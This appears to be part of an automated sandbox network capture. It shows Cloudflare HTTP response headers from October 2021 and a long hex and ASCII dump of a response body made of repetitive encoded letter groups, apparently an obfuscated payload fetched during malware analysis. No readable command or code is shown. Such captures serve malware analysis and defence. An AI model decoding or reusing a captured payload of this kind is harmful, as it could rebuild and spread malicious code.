                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TLijfGF2cuDrBxMtlr0rWbHjSDLcPmbUSUJCPIbKIlpwg0wawSvTicIGiM3IrTfaJfGtgmyAEFI%2B4wwvNcf39aNGhnOL3xB%2BlblDQDgiH482oRIGibKhTy%2F8ZSQlWzbuvnqVEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  2021-10-29 18:29:53 UTC1255INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                  2021-10-29 18:29:53 UTC1255INData Raw: 43 4e 56 4c 72 59 63 4d 49 57 2d 4d 4d 20 57 43 20 4e 72 72 20 43 20 4c 20 43 20 43 20 43 20 72 20 43 20 43 20 43 20 56 59 59 20 56 59 59 20 43 20 43 20 4e 49 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 63 72 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 4e 56 49 20 43 20 43 20 43 20 4e 72 20 4c 4e 20 4e 49 63 20 4e 72 20 43 20 4e 49 43 20 57 20 56 43 59 20 4c 4c 20 4e 49 72 20 4e 20 4d 63 20 56 43 59 20 4c 4c 20 49 72 20 4e 43 72 20 4e 43 59 20 4e 4e 59 20 4c 56 20 4e 4e 56 20 4e 4e 72 20 4e 4e 4e 20 4e 43 4c 20 4e 4e 72 20 57 4d 20 4e 43 57 20 4c 56 20 57 57 20 57 4d 20 4e 4e 43 20 4e
                                                  Data Ascii: CNVLrYcMIW-MM WC Nrr C L C C C r C C C VYY VYY C C NIr C C C C C C C cr C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C NVI C C C Nr LN NIc Nr C NIC W VCY LL NIr N Mc VCY LL Ir NCr NCY NNY LV NNV NNr NNN NCL NNr WM NCW LV WW WM NNC N
                                                  2021-10-29 18:29:53 UTC1256INData Raw: 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 43 20 56 59 20 72 43 20 56 56 57 20 4e 43 57 20 4e 4e 59 20 59 43 20 72 49 20 59 43 20 59 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 72 63 20 4e 72 4c 20 59 43 20 72 49 20 4e 4c 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20
                                                  Data Ascii: C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C C VY rC VVW NCW NNY YC rI YC YC Ir NNr NNM Nrc NrL YC rI NLI Yr Ir NNr NNM NCW NNV YC NNV YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr
                                                  2021-10-29 18:29:53 UTC1258INData Raw: 20 59 43 20 4e 59 63 20 4e 49 4c 20 59 59 20 49 72 20 4e 4e 72 20 49 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 72 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 20 59 72 20 49 72 20 4e 49 20 57 4e 20 4c 4e 20 4c 20 63 72 20 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4d 49 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 43 20 59 4e 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 57 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 59 4c 20 4e 43 57 20 4e 4e 56 20 4e 4e 72 20 4c 43 20 63
                                                  Data Ascii: YC NYc NIL YY Ir NNr IY NCW NNV YC NIr YN Yr Ir NNI NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI NI Yr Ir NI WN LN L cr IL YC Yr Ir NMI NNI NCW NNV YC VrC YN Yr Ir NNI NNM NCW NNV NWC rW YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr YL NCW NNV NNr LC c
                                                  2021-10-29 18:29:53 UTC1259INData Raw: 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20
                                                  Data Ascii: YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YC rI YC Yr
                                                  2021-10-29 18:29:53 UTC1260INData Raw: 20 4c 4d 20 72 4d 20 56 4e 4d 20 72 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56 4c 20 4c 49 20 63 72 20 59 59 20 49 72 20 4e 4e 72 20 59 20 4c 4e 20 72 4e 20 59 43 20 72 49 20 63 63 20 4d 56 20 4d 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 72 59 20 72 49 20 59 43 20 63 43 20 56 72 63 20 49 4d 20 57 49 20 4c 4e 20 4e 20 59 43 20 72 49 20 63 63 20 63 49 20 56 59 4e 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 56 20 63 49 20 4e 72 4d 20 4e 4e 72 20 4e 4e 4d 20 56 57 20 56 20 59 4c 20 72 57 20 59 43 20 4d 43 20 72 56 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 72 4d 20 59 43 20 59 72 20 57 72 20 56 43 49 20 57 4c 20
                                                  Data Ascii: LM rM VNM rV NNM NCW NNL VL LI cr YY Ir NNr Y LN rN YC rI cc MV Mr NNr NNM NCL II rY rI YC cC Vrc IM WI LN N YC rI cc cI VYN NNr NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV Nrr VN rV cI NrM NNr NNM VW V YL rW YC MC rV NCI NNM NCW NVV Vc rM YC Yr Wr VCI WL
                                                  2021-10-29 18:29:53 UTC1262INData Raw: 20 4e 4e 4c 20 63 57 20 4e 4e 72 20 59 43 20 72 49 20 56 59 20 49 57 20 4e 4e 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 59 20 4c 4c 20 59 72 20 56 43 43 20 49 56 20 4e 63 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 63 59 20 4c 43 20 59 43 20 59 72 20 57 72 20 4e 56 20 4e 4c 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 4e 20 4c 4e 20 4c 4c 20 4e 4e 72 20 4e 56 20 4e 72 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 43 63 20 59 56 20 56 4c 59 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 57 59 20 59 43 20 72 49 20 59 63 20 4e 57 20 56 4e 56 20 4e 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 59 4e 20 59 43 20 59 72 20 4e 56 4d 20 56 57 20 57 59 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 4c 20 59 59 20 4c 57 20 49 43 20 4e 72 43 20 4e 4e 59 20 4e 49 63
                                                  Data Ascii: NNL cW NNr YC rI VY IW NNV NNY NNM NCM WM YY LL Yr VCC IV Ncr NNc NCW NNI cY LC YC Yr Wr NV NLW NCW NNV Yr VN LN LL NNr NV NrV NCW NNV Yr VCc YV VLY IY NNr NNY LC WY YC rI Yc NW VNV NrC NNM NCW NNc Vc YN YC Yr NVM VW WY NCI NNV YV LL YY LW IC NrC NNY NIc
                                                  2021-10-29 18:29:53 UTC1263INData Raw: 20 59 43 20 59 72 20 57 72 20 57 43 20 4d 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 57 20 59 4c 20 4c 43 20 4e 4e 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4c 20 59 4c 20 59 72 20 63 4c 20 56 4c 59 20 4e 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 59 63 20 59 43 20 59 72 20 49 56 20 4e 56 63 20 4e 4e 72 20 4c 43 20 56 4e 57 20 59 43 20 72 49 20 59 56 20 4c 4d 20 49 43 20 57 57 20 4e 4e 4c 20 4e 4e 4c 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 56 56 56 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4d 59 20 4e 43 56 20 4c 4c 20 59 4c 20 4e 43 20 56 4c 72 20 49 72 20
                                                  Data Ascii: YC Yr Wr WC Mc NCW NNV Yc YW YL LC NNC NNr NNM NCL WL YL Yr cL VLY NVM NNY NNM NCW NNr Vc Yc YC Yr IV NVc NNr LC VNW YC rI YV LM IC WW NNL NNL VYL NCr rI YC YY NNL NcV VVV NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NLY Ir NNr NNY MY NCV LL YL NC VLr Ir
                                                  2021-10-29 18:29:53 UTC1264INData Raw: 20 49 72 20 4e 4e 72 20 4c 49 20 4e 43 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 4d 57 20 63 63 20 4e 4e 59 20 4e 43 57 20 59 56 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 43 43 20 4c 43 20 4d 57 20 59 43 20 72 49 20 59 63 20 63 43 20 49 63 20 4e 4e 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 72 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 57 20 59 43 20 59 72 20 57 72 20 4e 56 4e 20 4e 4e 72 20 63 57 20 4d 72 20 59 43 20 72 49 20 59 63 20 56 4d 20 49 4c 20 4e 4e 63 20 4e 56 43 20 4e 4d 63 20
                                                  Data Ascii: Ir NNr LI NCI NNV YC NCY YN Yr Ir NNL NNM NCW NNV cN rI YC YY MW cc NNY NCW YV rI rI YC YL Ir NNr NCC LC MW YC rI Yc cC Ic NNN VrI YY NNV YC rW VL VLC NrC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc W YC Yr Wr NVN NNr cW Mr YC rI Yc VM IL NNc NVC NMc
                                                  2021-10-29 18:29:53 UTC1266INData Raw: 43 49 20 49 59 20 56 56 63 20 56 4e 72 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 4d 56 20 59 4e 20 72 49 20 59 56 20 4c 57 20 49 4c 20 57 57 20 4e 4e 4c 20 4e 56 72 20 4e 4e 4d 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 4e 59 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 56 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 63 20 56 63 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 20 4d 72 20 59 4e 20 72 49 20 59 56 20
                                                  Data Ascii: CI IY VVc VNr YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM V MV YN rI YV LW IL WW NNL NVr NNM rY cL NWN NCI Ir NNr NNc MV NcC NYY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW VNM NCW NNV YV Yc Vc rI Ir NNr NNY V Mr YN rI YV
                                                  2021-10-29 18:29:53 UTC1267INData Raw: 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 4c 56 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 57 20 4c 59 20 59 59 20 72 4c 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 56 56 63 20 4e 59 57 20 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 72 59 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 72 4e 20 63 57 20 4e 4e 4d 20 4e 43 49 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 72 72 20 4e 4e 4d 20 4e 43 57 20
                                                  Data Ascii: Nr NNM NCI IY VVc NLV YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM NVc NNW LY YY rL NIM Nr NNr NNM NCI IY VVc NYW YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc rY NNV YC YI LN rN cW NNM NCI VVr rV YC rI YN NW NLV Nrr NNM NCW
                                                  2021-10-29 18:29:53 UTC1268INData Raw: 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 43 20 4c 4c 20 59 72 20 4c 59 20 59 43 20 63 57 20 4e 4e 57 20 4e 43 63 20 4e 56 43 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 59 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 59 72 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4e 20 49 49 20 59 56 20 72 49 20 59 43 20 72 49 20 4c 49 20 4e 20 4e 4e 57 20 4e 43 57 20 43 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 56 57 20 4e 43 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4c 20 63 57 20 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 57 20 59 49 20 4c 4c 20 59 49 20 4c 57 20 49 43 20 57 57 20 4e 4e 56 20 4e 4e 72 20 4e 56 72 20 4e 57
                                                  Data Ascii: Y NNM NCW NCC LL Yr LY YC cW NNW NCc NVC VYL NCr rI YC YY NNL NcV NYM NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI WL NYr Ir NNr NNY NCN II YV rI YC rI LI N NNW NCW C Mc rc YC Yr Wr VW NCc NCW NNV Yc LY YL cW Nc NNY NNM NCM WW YI LL YI LW IC WW NNV NNr NVr NW
                                                  2021-10-29 18:29:53 UTC1270INData Raw: 56 4d 20 4e 4e 72 20 63 20 4e 20 72 56 20 72 49 20 4c 4c 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 59 20 4e 20 4e 20 59 4d 20 49 4d 20 57 43 20 63 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 43 20 56 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4c 20 57 4e 20 63 43 20 59 43 20 4c 63 20 4c 72 20 4e 56 72 20 49 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 57 4c 20 4e 4e 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 4e 4d 4e 20 4e 4e 43 20 49 63 20 56 4c 63 20 72 49 20 59 56 20 56 49 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 72 20 59 43 20 4c 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 49 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 4c 4c 20 63 20 49 63 20 4e 4e 72 20 49 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 59 20 59 43 20
                                                  Data Ascii: VM NNr c N rV rI LL YW IY NNM NCW NVV rY N N YM IM WC cV NCW NNV Yc YC Vc rC Ir NNr NNY NCL WN cC YC Lc Lr NVr Ir NNM NCW NNI WL NN YC Yr Wr NVC NMN NNC Ic VLc rI YV VI IY WI NNM NCW NNV YC Yr YC L NNN NNr NNI WI NNV YC rW LL c Ic NNr IV NCW NNV YC YY YC
                                                  2021-10-29 18:29:53 UTC1271INData Raw: 56 20 59 43 20 56 4d 20 57 4c 20 56 72 49 20 49 59 20 4e 4e 72 20 4e 4e 59 20 56 20 4e 63 4e 20 59 4e 20 72 49 20 59 56 20 63 43 20 4e 4c 49 20 4e 4e 4c 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 56 4c 63 20 59 4e 20 56 43 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 4c 20 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4d 20 72 57 20 59 43 20 59 72 20 4d 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 49 4c 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 4e 20 59 72 20 49 72 20 57 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 72 57 20 72 49 20 59 43
                                                  Data Ascii: V YC VM WL VrI IY NNr NNY V NcN YN rI YV cC NLI NNL IL NMW NNV VLc YN VC VLV Ir NNc WY NCW NNV YC NNL c Yr Ir NNr NNM NCW NNV YM rW YC Yr Mc NNr NNM NCW IL YN rI YC YL Ir NNr NNM WI NNV YC rW YC Yr Ir NNr NVN NCW NNV YC rr YN Yr Ir WC NNc NCW NNV rW rI YC
                                                  2021-10-29 18:29:53 UTC1272INData Raw: 4e 72 20 57 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 56 72 57 20 56 59 59 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 4e 72 20 72 57 20 59 43 20 59 72 20 57 59 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 56 4e 20 72 57 20 59 43 20 72 49 20 57 72 20 4e 4e 56 20 56 63 20 59 56 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 43 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 56 20 4d 56 20 4e 72 59 20 72 49 20 59 43 20 59 72 20 49 4c 20 56 57 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 56 4e 20 4e 43 4e 20 4c 4e 20 4e 4e 43 20 72 49 20 59 43 20 63 43 20 4c 49 20 56 72 4d 20 4e 4e 57 20 4e 43 57 20
                                                  Data Ascii: Nr WM NCW NNV YC rI YC Yr IV NNr VrW VYY NNV rW YI YC Yr IY NCY cW NCY NNV NNr rW YC Yr WY NNr NNM NVr L NVN rW YC rI Wr NNV Vc YV NNV YC YI WL NCW Ir NNr NVM NCV MV NrY rI YC Yr IL VW NVV NCW NNV Yc cI LM Yr Ir NNY NVN NCN LN NNC rI YC cC LI VrM NNW NCW
                                                  2021-10-29 18:29:53 UTC1274INData Raw: 4e 4e 56 20 4c 59 20 63 4d 20 72 4c 20 59 72 20 49 72 20 4e 56 43 20 4e 56 4d 20 4e 4e 4e 20 4e 72 20 72 49 20 72 57 20 59 43 20 59 43 20 4e 4e 4c 20 57 59 20 57 49 20 4d 59 20 4e 72 20 59 4e 20 72 57 20 59 43 20 59 43 20 4e 4d 43 20 4e 4e 63 20 4e 59 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 63 4d 20 72 43 20 59 72 20 49 72 20 4e 56 43 20 49 43 20 56 4c 4d 20 4e 4e 72 20 59 4e 20 72 49 20 59 72 20 4c 43 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4c 4e 20 72 63 20 72 49 20 59 43 20 63 43 20 57 59 20 4d 72 20 63 72 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 59 20 57 4c 20 72 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 57 4d 20 4e 56 43 20 72 56 20 4c 57 20 4c 4d 20 4e 49 4d 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 4c 63 20 72 4d 20 72 56 20 4e 49 4d
                                                  Data Ascii: NNV LY cM rL Yr Ir NVC NVM NNN Nr rI rW YC YC NNL WY WI MY Nr YN rW YC YC NMC NNc NYN NCI NNV YV cM rC Yr Ir NVC IC VLM NNr YN rI Yr LC IY NNr NNM MC LN rc rI YC cC WY Mr cr NCI NNV YC YY WL rL Ir NNr NVM WM NVC rV LW LM NIM NV NNr NNM NCI IY Lc rM rV NIM
                                                  2021-10-29 18:29:53 UTC1275INData Raw: 4e 4c 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 72 43 20 59 4e 20 72 49 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4d 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 4d 20 59 4e 20 59 72 20 49 72 20 56 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 72 57 20 72 49 20 59 43 20 59 72 20 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 72 56 20 4e 4e 4c 20 59 43 20 72 49 20 4d 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 72 56 20 4e 4e 59 20 4e 4e 4d 20
                                                  Data Ascii: NLI NNr NNM NCW rC YN rI YC Yc Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr MV NCW NNV YC VM YN Yr Ir Vc NNc NCW NNV rW rI YC Yr Wr NNr NNM NCI NNr YC rI YC M Ir NNr NNM rV NNL YC rI Mr YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr rV NNY NNM
                                                  2021-10-29 18:29:53 UTC1276INData Raw: 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 43 20 72 49 20 59 63 20 49 57 20 57 49 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 56 20 59 63 20 4c 59 20 59 43 20 4d 49 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 43 49 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 4e 59 49 20 72 49 20 59 43 20 72 49 20 59 57 20 4d 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 49 20 59 4e 20 59 72 20 49 56 20 57 57 20 4e 4e 59 20 4e 43 4e 20 57 4d 20 59
                                                  Data Ascii: WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM cW rW YC rI Yc IW WI NNY NNM NCM WM YV Yc LY YC MI VYY rM NCW NNV YN VN VVc VCI Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN NYI rI YC rI YW ML NNM NCW NVV WL I YN Yr IV WW NNY NCN WM Y
                                                  2021-10-29 18:29:53 UTC1278INData Raw: 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4e 72 20 4e 4e 56 20 59 43 20 59 49 20 4c 72 20 59 72 20 49 63 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4d 59 20 72 63 20 56 4c 56 20 4e 56 56 20 4c 4e 20 49 59 20 72 49 20 59 43 20 63 43 20 57 59 20 4e 4e 4d 20 4e 43 57 20 56 72 4d 20 4e 4e 43 20 4e 57 4e 20 4e 43 63 20 59 43 20 59 72 20 49 59 20 49 4d 20 4e 63 59 20 56 72 4c 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 4c 43 20 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 56 20 59 56 20 59 59 20 4c 4d 20 4e 4d 56 20 57 72 20 49 57 20 4e 4e 4c 20 4e 43 63 20 4e 43 56 20 4e 63 49 20 59 49 20 56 4c 63 20 59 4c 20 4e 4e 72 20 4e 4d 56 20 4e 4e
                                                  Data Ascii: Yr Ir NVC Vc NNr NNV YC YI Lr Yr Ic NCN VrI YY NNV YC rW VL LV MY rc VLV NVV LN IY rI YC cC WY NNM NCW VrM NNC NWN NCc YC Yr IY IM NcY VrL NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc LC W NNr NNM NCL WV YV YY LM NMV Wr IW NNL NCc NCV NcI YI VLc YL NNr NMV NN
